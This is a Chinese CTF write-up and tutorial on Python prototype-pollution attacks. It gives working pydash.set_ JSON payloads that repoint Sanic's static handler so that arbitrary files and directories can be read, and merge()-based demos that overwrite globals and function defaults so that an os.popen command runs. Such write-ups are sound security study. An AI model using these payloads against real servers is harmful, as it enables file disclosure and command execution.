log_file_bak = "/tmp/" + log_dir_bak + "/access.log.bak"
log = 'key: ' + str(key) + '|' + 'value: ' + str(value);
# 生成日志文件
os.system("mkdir /tmp/" + log_dir)
with open(log_file, 'w') as f:
f.write(log)
# 备份日志文件
os.system("mkdir /tmp/" + log_dir_bak)
with open(log_file_bak, 'w') as f:
f.write(log)
return text("!!!此地禁止胡来,你的非法操作已经被记录!!!")


if __name__ == '__main__':
app.run(host='0.0.0.0')

​ 一眼不丁真。这个感觉和之前打的题都不一样,因为之前的思路都是污染__file__属性,但是这一次似乎不是,并且,pollute路由还过滤了parts和proc以及限制value不能是列表。

​ 这个题我不是很能理解,感觉很逆天,考点主要的是sanic框架的漏洞题,先贴一下原理吧,虽然我也不是很明白。

​ 首先是根基static函数,之后,之后跟进DirectoryHandler类,找到了如下两段:

1
2
3
4
5
6
      current = path.strip("/")[len(self.base) :].strip("/")  # noqa: E203

if self.directory_view:
return self._index(
self.directory / current, path, request.app.debug
)

​ 当开启了目录功能后,就会进入

1
2
3
return self._index(
self.directory / current, path, request.app.debug
)

​ 这一点很重要,跟进_index看看:

1
2
3
4
5
6
7
8
9
10
def _index(self, location: Path, path: str, debug: bool):
# Remove empty path elements, append slash
if "//" in path or not path.endswith("/"):
return redirect(
"/" + "".join([f"{p}/" for p in path.split("/") if p])
)

# Render file browser
page = DirectoryPage(self._iter_files(location), path, debug)
return html(page.render())

​ 很显然,_index是一个拼接函数,主要是为了拼接目录的。根据下面这一行,我们又有了可以操作的空间了:

1
current = path.strip("/")[len(self.base) :].strip("/")  # noqa: E203

​ 发现了啥?这里path在被分割的时候有个情况,就是将路径从base字符串结尾开始的所有字符串去掉头尾的'/'字符后返回,也就是说,当我们把base属性污染成指定的字符串之后,后面如果出现了两个点,也就是..就说明了current返回的字符串可能存在路径穿越。

​ 好了, 再回来看看这个题,首先,最好应该先获取完整的源代码,所以这里可以像之前的题一样污染directory_view属性打开静态文件目录。payload如下:

1
2
3
4
5
6
7
{
"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view",
"value": 1
}

#这个payload不知道为啥访问static目录的时候感觉没啥变化,但是如果加上了像什么/static/etc/passwd之类的文件却能访问到
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory","value": "/"}

在这里插入图片描述

​ 既然能成,那正常访问/static/proc/1/cmdline,发现了重要的东西,就是

1
/bin/bash  /start.sh

​ 访问 /static/start.sh之后获得信息:

1
2
3
4
5
6
7
8
#!/bin/bash

if [[ -f /flag.sh ]]; then
source /flag.sh
rm -f /flag.sh
fi

python3 /app/2Q17A58T9F65y5i8.py

​ 找到了文件名了,读取/static/app/2Q17A58T9F65y5i8.py看看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from sanic import Sanic
import os
from sanic.response import text, html
import sys
import random
import pydash
# pydash==5.1.2

#源码好像被admin删掉了一些,听他说里面藏有大秘密
class Pollute:
def __init__(self):
pass

def create_log_dir(n):
ret = ""
for i in range(n):
num = random.randint(0, 9)
letter = chr(random.randint(97, 122))
Letter = chr(random.randint(65, 90))
s = str(random.choice([num, letter, Letter]))
ret += s
return ret

app = Sanic(__name__)
app.static("/static/", "./static/")

@app.route("/Wa58a1qEQ59857qQRPPQ")
async def secret(request):
with open("/h111int",'r') as f:
hint=f.read()
return text(hint)

@app.route('/', methods=['GET', 'POST'])
async def index(request):
return html(open('static/index.html').read())

@app.route("/adminLook", methods=['GET'])
async def AdminLook(request):
#方便管理员查看非法日志
log_dir=os.popen('ls /tmp -al').read();
return text(log_dir)

@app.route("/pollute", methods=['GET', 'POST'])
async def POLLUTE(request):
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and 'parts' not in key and 'proc' not in str(value) and type(value) is not list:
pollute = Pollute()
pydash.set_(pollute, key, value)
return text("success")
else:
log_dir=create_log_dir(6)
log_dir_bak=log_dir+".."
log_file="/tmp/"+log_dir+"/access.log"
log_file_bak="/tmp/"+log_dir_bak+"/access.log.bak"
log='key: '+str(key)+'|'+'value: '+str(value);
#生成日志文件
os.system("mkdir /tmp/"+log_dir)
with open(log_file, 'w') as f:
f.write(log)
#备份日志文件
os.system("mkdir /tmp/"+log_dir_bak)
with open(log_file_bak, 'w') as f:
f.write(log)
return text("!!!此地禁止胡来,你的非法操作已经被记录!!!")


if __name__ == '__main__':
app.run(host='0.0.0.0')

​ 这儿发现了个可以利用的点,似乎有个可以利用的产生目录穿越的点了,因为生成的log_dir变量后面增加了个..作为备份:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
else:
log_dir=create_log_dir(6)
log_dir_bak=log_dir+".."
log_file="/tmp/"+log_dir+"/access.log"
log_file_bak="/tmp/"+log_dir_bak+"/access.log.bak"
log='key: '+str(key)+'|'+'value: '+str(value);
#生成日志文件
os.system("mkdir /tmp/"+log_dir)
with open(log_file, 'w') as f:
f.write(log)
#备份日志文件
os.system("mkdir /tmp/"+log_dir_bak)
with open(log_file_bak, 'w') as f:
f.write(log)
return text("!!!此地禁止胡来,你的非法操作已经被记录!!!")

​ 不过先访问下机密路由Wa58a1qEQ59857qQRPPQ

1
2
flag in /app,but you need to find his name!!!
Find a way to see the file names in the app directory

​ 提示很明显了,flag在/app文件夹内。

​ 这里似乎有个没用到的看起来很重要的点,先提前随便进行一次个不能成功的污染,比如key中存在parts字符串。之后访问下这个adminLook路由试试:

1
2
3
4
5
6
total 0
drwxrwxrwt 1 root root 57 Jul 21 23:04 .
drwxr-xr-x 1 root root 43 Jul 21 22:49 ..
drwxr-xr-x 2 root root 24 Jul 21 23:04 73ycOr
drwxr-xr-x 2 root root 28 Jul 21 23:04 73ycOr..
drwx------ 2 root root 31 Jul 21 22:49 pymp-zra4pxem

​ 可以看到,成功产生了一个结尾两个点的目录,之后就是污染base属性进行目录穿越了,payload 如下:

1
2
3
4
5
6
7
8
#先切换到/tep目录下
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory","value": "/tmp"}

#对base属性进行污染
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.base","value": "static/73ycOr"}

#打开目录功能
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view","value": 1}

​ 然后访问/static/73ycOr../找到了flag文件的文件名:45W698WqtsgQT1_flag

​ 之后污染静态文件目录为根目录,然后访问/static/app/45W698WqtsgQT1_flag 即可:

1
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory","value": "/"}

​ flag:DASCTF{8543c470-d4aa-4668-b051-43ed5c9517b1}

Python原型链污染变体(跟随Article_kelp学)

​ 前面的基础已经说过了,这里就跳过了,具体可以看看之前的merge函数方面的内容。

1、更广泛的获取:

​ 污染类属性是可以通过示例的__base__属性查找到其继承的父类,但是如果目标类与切入点类或实例没有继承关系时,这种方法就显得十分无力,代码在上面也早已给出来了。

2、全局变量的获取:

​ 在Python中,函数或类方法(对于类的内置方法如__init__这些来说,内置方法在并未重写时其数据类型为装饰器即wrapper_descriptor,只有在重写后才是函数function)均具有一个__globals__属性,该属性将函数或类方法所申明的变量空间中的全局变量以字典的形式返回(相当于这个变量空间中的globals函数的返回值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
secret_var = 114

def test():
pass

class a:
secret_class_var = "secret"

class b:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = b()

payload = {
"__init__" : {
"__globals__" : {
"secret_var" : 514,
"a" : {
"secret_class_var" : "Pooooluted ~"
}
}
}
}

print(a.secret_class_var)
#secret
print(secret_var)
#114
merge(payload, instance)
print(a.secret_class_var)
#Pooooluted ~
print(secret_var)
#514

3、已加载模块获取:

​ 局限于当前模块的全局变量获取显然不够,很多情况下需要对并不是定义在入口文件中的类对象或者属性,而我们的操作位置又在入口文件中,这个时候就需要对其他加载过的模块来获取了

加载关系简单:

​ 在加载关系简单的情况下,我们可以直接从文件的import语法部分找到目标模块,这个时候我们就可以通过获取全局变量来得到目标模块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#test.py

import test_1

class cls:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = cls()

payload = {
"__init__" : {
"__globals__" : {
"test_1" : {
"secret_var" : 514,
"target_class" : {
"secret_class_var" : "Poluuuuuuted ~"
}
}
}
}
}

print(test_1.secret_var)
#secret
print(test_1.target_class.secret_class_var)
#114
merge(payload, instance)
print(test_1.secret_var)
#514
print(test_1.target_class.secret_class_var)
#Poluuuuuuted ~
1
2
3
4
5
6
#test_1.py

secret_var = 114

class target_class:
secret_class_var = "secret"

加载关系复杂–示例:

​ 如CTF题目等实际环境中往往是多层模块导入,甚至是存在于内置模块或三方模块中导入,这个时候通过直接看代码文件中import语法查找就十分困难,而解决方法则是利用sys模块

sys模块的modules属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块.`

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#test.py

import test_1
import sys

class cls:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = cls()

payload = {
"__init__" : {
"__globals__" : {
"sys" : {
"modules" : {
"test_1" : {
"secret_var" : 514,
"target_class" : {
"secret_class_var" : "Poluuuuuuted ~"
}
}
}
}
}
}
}

print(test_1.secret_var)
#secret
print(test_1.target_class.secret_class_var)
#114
merge(payload, instance)
print(test_1.secret_var)
#514
print(test_1.target_class.secret_class_var)
#Poluuuuuuted ~
1
2
3
4
5
6
7
#test_1.py

secret_var = 114

class target_class:
secret_class_var = "secret"

​ 当然我们去使用的Payload绝大部分情况下是不会这样的,如上的Payload实际上是在已经import sys的情况下使用的,而大部分情况是没有直接导入的,这样问题就从寻找import特定模块的语句转换为寻找import了sys模块的语句,对问题解决的并不见得有多少优化

4、函数形参默认值替换:

​ 主要用到了函数的__defaults____kwdefaults__这两个内置属性

__defaults__

__defaults__以元组的形式按从左到右的顺序收录了函数的位置或键值形参的默认值,需要注意这个位置或键值形参是特定的一类形参,并不是位置形参+键值形参,关于函数的参数分类可以参考这篇文章:python函数的位置参数(Positional)和关键字参数(keyword) - 知乎 (zhihu.com)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def func_a(var_1, var_2 =2, var_3 = 3):
pass

def func_b(var_1, /, var_2 =2, var_3 = 3):
pass

def func_c(var_1, var_2 =2, *, var_3 = 3):
pass

def func_d(var_1, /, var_2 =2, *, var_3 = 3):
pass

print(func_a.__defaults__)
#(2, 3)
print(func_b.__defaults__)
#(2, 3)
print(func_c.__defaults__)
#(2,)
print(func_d.__defaults__)
#(2,)

​ 通过替换该属性便能实现对函数位置或键值形参的默认值替换,但稍有问题的是该属性值要求为元组类型,而通常的如JSON等格式并没有元组这一数据类型设计概念,这就需要环境中有合适的解析输入的方式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def evilFunc(arg_1 , shell = False):
if not shell:
print(arg_1)
else:
print(__import__("os").popen(arg_1).read())

class cls:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = cls()

payload = {
"__init__" : {
"__globals__" : {
"evilFunc" : {
"__defaults__" : (
True ,
)
}
}
}
}

evilFunc("whoami")
#whoami
merge(payload, instance)
evilFunc("whoami")
#article-kelp

__kwdefaults__

__kwdefaults__以字典的形式按从左到右的顺序收录了函数键值形参的默认值,从代码上来看,则是如下的效果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def func_a(var_1, var_2 =2, var_3 = 3):
pass

def func_b(var_1, /, var_2 =2, var_3 = 3):
pass

def func_c(var_1, var_2 =2, *, var_3 = 3):
pass

def func_d(var_1, /, var_2 =2, *, var_3 = 3):
pass

print(func_a.__kwdefaults__)
#None
print(func_b.__kwdefaults__)
#None
print(func_c.__kwdefaults__)
#{'var_3': 3}
print(func_d.__kwdefaults__)
#{'var_3': 3}

​ 通过替换该属性便能实现对函数键值形参的默认值替换

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def evilFunc(arg_1 , * , shell = False):
if not shell:
print(arg_1)
else:
print(__import__("os").popen(arg_1).read())

class cls:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = cls()

payload = {
"__init__" : {
"__globals__" : {
"evilFunc" : {
"__kwdefaults__" : {
"shell" : True
}
}
}
}
}

evilFunc("whoami")
#whoami
merge(payload, instance)
evilFunc("whoami")
#article-kelp

5、SECRET_KEY:

​ 决定flasksession生成的重要参数,知道该参数可以实现session任意伪造。

最后的补充:

1、merge函数

​ 首先,在最开始看到merge函数的时候,我当时没有仔细看过这个函数的逻辑,现在来分析下这个函数:

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

​ 首先说一下我的知识盲区,算是因为这个,我才看不懂这个函数的源码的吧。

​ 首先是字典的items方法, python中的items是可以将字典中的所有项,以列表方式返回。大概情况如下:

1
2
3
4
a = {"a":"1","b":"2","c":"123"}
print(a.items())

#dict_items([('a', '1'), ('b', '2'), ('c', '123')])

​ 其次就是hasattr()函数:hasattr() 是一个内置函数,用于检查对象是否具有给定的属性。这个函数接收两个参数:第一个参数是要检查的对象,第二个参数是要查找的属性名称。如果对象具有该属性,则 hasattr() 函数返回 True,否则返回 False。大概情况如下:

1
2
3
4
5
6
7
class A:
def __init__(self):
self.a = 123
a = A()
print(hasattr(a,'a'))

#True

​ 之后是__getitem__属性:在 Python 中,__getitem__ 是一个特殊方法,用于定义对象的索引访问行为。它使得对象可以使用方括号 [] 进行索引操作,类似于列表、元组和字典等内置容器类型。

大致上,可以通过这个属性是否存在来判断某个对象是否为字典,不过不能准确确定下来。

​ 再之后是字典的get方法,这个是获取字典中指定键的值,具体不做演示。

​ 最后:setattr() 函数的功能相对比较复杂,它最基础的功能是修改类实例对象中的属性值。其次,它还可以实现为实例对象动态添加属性或者方法。示例如下:

1
2
3
4
5
6
7
8
9
10
11
class A:
def __init__(self):
self.a = 123
a = A()
print(a.a)
setattr(a,'a','321')
print(a.a)


#123
#321

​ 好了,用下面这个做下测试,在函数里下一个断定,来调试看看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)


a = {"a":"1","b":"2","c":"c"}
c = {"c":"3"}

merge(a,c)
print(c)

​ 最开始的时候,k,v分别获取了a和1这两个字符,然后继续向后执行,当函数执行到if hasattr(dst, '__getitem__'):的时候,如果发现有__getitem__属性,则大致判断这个是个字典,执行下一步,如果没有,则判断目标字典里是否存在a这一个属性,以及是否为字典,如果是字典,则递归调用,如果不是字典,则执行else里面的语句,设置一个全新的属性在后面。在这里因为目标字典只有c字段,但是源对象是一个字典,所以会进入if,进而设置一个新的属性,也就是成功加进去了。

if dst.get(k) and type(v) == dict:这一行,检查目标字典的k键,也就是第一次进入时迭代获取到的a属性,目标是确认a属性是否有值,同时判断k是否为字典,如果k是字典,就递归执行。

大概就是这样的,可能不算很详细吧,这个只有自己打断点调试才能看出来吧。

2、pydash的set_函数源码信息:

​ 无可奈何之下, 这里选择先审以下set_的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def set_(obj, path, value):
"""
Sets the value of an object described by `path`. If any part of the object path doesn't exist,
it will be created.
设置由“path”描述的对象的值。如果对象路径的任何部分不存在,它将被创建。(这里稍微有点类似于flask的ssti里面找链子的方式。)

Args:
obj (list|dict): Object to modify.
path (str | list): Target path to set value to.
value (mixed): Value to set.

Returns:
mixed: Modified `obj`.

Warning:
`obj` is modified in place.

Example:

>>> set_({}, 'a.b.c', 1)
{'a': {'b': {'c': 1}}}
>>> set_({}, 'a.0.c', 1)
{'a': {'0': {'c': 1}}}
>>> set_([1, 2], '[2][0]', 1)
[1, 2, [1]]
>>> set_({}, 'a.b[0].c', 1)
{'a': {'b': [{'c': 1}]}}

.. versionadded:: 2.2.0

.. versionchanged:: 3.3.0
Added :func:`set_` as main definition and :func:`deep_set` as alias.

.. versionchanged:: 4.0.0

- Modify `obj` in place.
- Support creating default path values as ``list`` or ``dict`` based on whether key or index
substrings are used.
- Remove alias ``deep_set``.
"""
return set_with(obj, path, value)

​ 可以发现,这个函数底层是使用的set_with函数,同时,这个函数会将第一个参数作为模板,将第二个参数通过点构成的类似链子的东西递归成一个对象,这种对象类似于第一个参数的类型,比如第一个参数传入的是一个字典,那么久递归成字典的形式,和它举的例子相似,这里久不进行操作了。

​ 然后接下来就是set_with函数了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def set_with(obj, path, value, customizer=None):
"""
This method is like :func:`set_` except that it accepts customizer which is invoked to produce
the objects of path. If customizer returns undefined path creation is handled by the method
instead. The customizer is invoked with three arguments: ``(nested_value, key, nested_object)``.
这个方法类似于:func:`set_`,除了它接受定制器,调用customizer生成路径的对象。如果customizer返回未定义的路径,则由该方法处理路径创建
相反。使用三个参数调用customizer:`(nested_value、key、nested_object)``

Args:
obj (list|dict): Object to modify.
path (str | list): Target path to set value to.
value (mixed): Value to set.
customizer (callable, optional): The function to customize assigned values.

Returns:
mixed: Modified `obj`.

Warning:
`obj` is modified in place.

Example:

>>> set_with({}, '[0][1]', 'a', lambda: {})
{0: {1: 'a'}}

.. versionadded:: 4.0.0

.. versionchanged:: 4.3.1
Fixed bug where a callable `value` was called when being set.
"""
return update_with(obj, path, pyd.constant(value), customizer=customizer)

​ 这个函数底层调用了update_with函数,跟进看看,这个函数不是很能搞懂customizer这个参数的作业。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
def update_with(obj, path, updater, customizer=None):  # noqa: C901
"""
This method is like :func:`update` except that it accepts customizer which is invoked to produce
the objects of path. If customizer returns ``None``, path creation is handled by the method
instead. The customizer is invoked with three arguments: ``(nested_value, key, nested_object)``.

Args:
obj (list|dict): Object to modify.
path (str|list): A string or list of keys that describe the object path to modify.
updater (callable): Function that returns updated value.
customizer (callable, optional): The function to customize assigned values.

这个方法类似于:func:`update`,除了它接受定制器,调用定制器生成
路径的对象。如果定制器返回“None”,则路径创建由以下方法处理
相反。使用三个参数调用定制器:“(nested_value,key,nested_object)”。

Returns:
mixed: Updated `obj`.

Warning:
`obj` is modified in place.

Example:

>>> update_with({}, '[0][1]', lambda: 'a', lambda: {})
{0: {1: 'a'}}

.. versionadded:: 4.0.0
"""
if not callable(updater):
updater = pyd.constant(updater)

if customizer is not None and not callable(customizer):
call_customizer = partial(callit, clone, customizer, argcount=1)
elif customizer:
call_customizer = partial(callit, customizer, argcount=getargcount(customizer, maxargs=3))
else:
call_customizer = None

default_type = dict if isinstance(obj, dict) else list
#使用 to_path_tokens(path) 将 path 转换为路径标记的列表。
tokens = to_path_tokens(path)

#如果解析结果不是列表,则将其转换为单元素列表。
if not pyd.is_list(tokens): # pragma: no cover
tokens = [tokens]

last_key = pyd.last(tokens)

if isinstance(last_key, PathToken):
last_key = last_key.key

target = obj

for idx, token in enumerate(pyd.initial(tokens)):
if isinstance(token, PathToken):
key = token.key
default_factory = pyd.get(tokens, [idx + 1, "default_factory"], default=default_type)
else:
key = token
default_factory = default_type

obj_val = base_get(target, key, default=None)
path_obj = None

if call_customizer:
path_obj = call_customizer(obj_val, key, target)

if path_obj is None:
path_obj = default_factory()

base_set(target, key, path_obj, allow_override=False)

try:
target = base_get(target, key, default=None)
except TypeError as exc: # pragma: no cover
try:
target = target[int(key)]
_failed = False
except Exception:
_failed = True

if _failed:
raise TypeError(f"Unable to update object at index {key!r}. {exc}")

value = base_get(target, last_key, default=None)
base_set(target, last_key, callit(updater, value))

return obj

​ 这里先放着这个源码,先读一下to_path_tokens

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def to_path_tokens(value):
"""Parse `value` into :class:`PathToken` objects."""
if pyd.is_string(value) and ("." in value or "[" in value):
# Since we can't tell whether a bare number is supposed to be dict key or a list index, we
# support a special syntax where any string-integer surrounded by brackets is treated as a
# list index and converted to an integer.

#由于我们无法判断一个空数应该是字典键还是列表索引,我们
#支持一种特殊语法,其中任何被括号括起来的字符串整数都被视为
#列表索引并转换为整数。
keys = [ #使用正则表达式 RE_PATH_KEY_DELIM来分割字符串。分割后,对于每个部分(key),会进一步检查:
PathToken(int(key[1:-1]), default_factory=list)
#如果 key 匹配 RE_PATH_LIST_INDEX,则将该部分视为列表索引,并创建一个 PathToken 对象,其键为转换后的整数索引,默认值生成器为 list。
if RE_PATH_LIST_INDEX.match(key)
else PathToken(unescape_path_key(key), default_factory=dict)
for key in filter(None, RE_PATH_KEY_DELIM.split(value))
]

#如果 key 不匹配 RE_PATH_LIST_INDEX,则将其视为字典键,并通过 unescape_path_key(未在代码段中定义,但我们可以假设它用于处理可能的转义字符)函数处理后,创建一个 PathToken 对象,其键为处理后的字符串,默认值生成器为 dict。
elif pyd.is_string(value) or pyd.is_number(value):
keys = [PathToken(value, default_factory=dict)]
#如果 value 是 UNSET则返回一个空的 PathToken 列表。
elif value is UNSET:
keys = []
#如果 value 不是上述任何一种情况(即它可能已经是一个列表或类似结构),则直接返回 value(尽管这里可能存在一个类型不匹配的问题,因为通常我们期望返回的是 PathToken 对象的列表,而不是原始值)。然而,基于函数的命名和描述,这可能是一个错误或特殊情况的处理方式。
else:
keys = value

return keys

​ 这里比较重要,分析一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#遍历path并更新对象
for idx, token in enumerate(pyd.initial(tokens)):#这行代码使用enumerate函数遍历tokens列表,但通过pyd.initial函数来获取除了最后一个元素之外的所有元素。这意味着遍历将跳过tokens列表的最后一个元素。

#这里检查当前遍历到的token是否是PathToken类的实例。如果是,则从token中提取key值,并尝试从tokens中获取下一个元素的default_factory。如果不存在,则使用default_type作为默认值。
if isinstance(token, PathToken):
key = token.key
default_factory = pyd.get(tokens, [idx + 1, "default_factory"], default=default_type)

#如果token不是PathToken类的实例,则直接将token作为key,并将default_factory设置为default_type。
else:
key = token
default_factory = default_type


#使用base_get函数尝试从target对象中获取key对应的值,如果没有找到则默认为None。同时,将path_obj初始化为None。
obj_val = base_get(target, key, default=None)
path_obj = None


#如果call_customizer为真(假设是一个函数),则调用该函数,并传入当前值obj_val、键key和目标对象target,结果赋值给path_obj。
if call_customizer:
path_obj = call_customizer(obj_val, key, target)

#如果path_obj仍然是None,则调用default_factory来创建一个新的对象,并将其赋值给path_obj。
if path_obj is None:
path_obj = default_factory()

#使用base_set函数将path_obj设置到target对象的key位置上,且不允许覆盖
base_set(target, key, path_obj, allow_override=False)


#尝试重新获取target对象中key对应的值,如果失败,会捕获TypeError。在捕获异常的处理中,尝试将key作为索引来直接从target中获取元素。如果这也失败,则标记为失败(_failed = True)并抛出一个包含原始异常信息的TypeError。
try:
target = base_get(target, key, default=None)
except TypeError as exc: # pragma: no cover
try:
target = target[int(key)]
_failed = False
except Exception:
_failed = True

if _failed:
raise TypeError(f"Unable to update object at index {key!r}. {exc}")

​ 这个 update_with 函数的作用可以总结如下:

  1. 更新嵌套对象:函数用于在给定的 obj(一个列表或字典)中按照 path 指定的路径更新一个值。
  2. 路径处理path 可以是一个字符串或键的列表,描述了要修改的对象路径。
  3. 自定义更新updater 是一个可调用对象,它用于生成更新后的值。如果 updater 不是一个可调用对象,它会被转换为一个返回常量值的函数。
  4. 自定义值生成customizer 是一个可选的可调用对象,它用于自定义路径上的对象值。如果 customizer 返回 None,则路径上的对象值由函数本身处理。
  5. 自定义参数customizer 被调用时接收三个参数:(nested_value, key, nested_object)
  6. 递归创建路径:函数递归地遍历 path,创建路径上的对象,如果路径上的对象不存在,则使用 default_factory 创建。
  7. 更新最终值:遍历完成后,使用 updater 更新路径最终位置上的值。
  8. 错误处理:如果在获取或设置路径上的值时遇到 TypeError,函数会尝试使用整数索引访问,如果仍然失败,则抛出异常。
  9. 原地修改obj 是直接在原对象上进行修改的,而不是返回一个新的对象。
  10. 返回值:函数返回修改后的 obj

​ 简而言之,update_with 函数根据提供的路径,使用自定义逻辑递归地创建或更新一个嵌套的列表或字典中的值,并在路径的最终位置应用一个更新函数。

参考文章:

基础资料

Python原型链污染

Python原型链污染变体(prototype-pollution-in-python)

Pydash 原型链污染

做题参考:

从CISCN2024的sanic引发对python“原型链”的污染挖掘

CISCN2024-WEB-Sanic gxngxngxn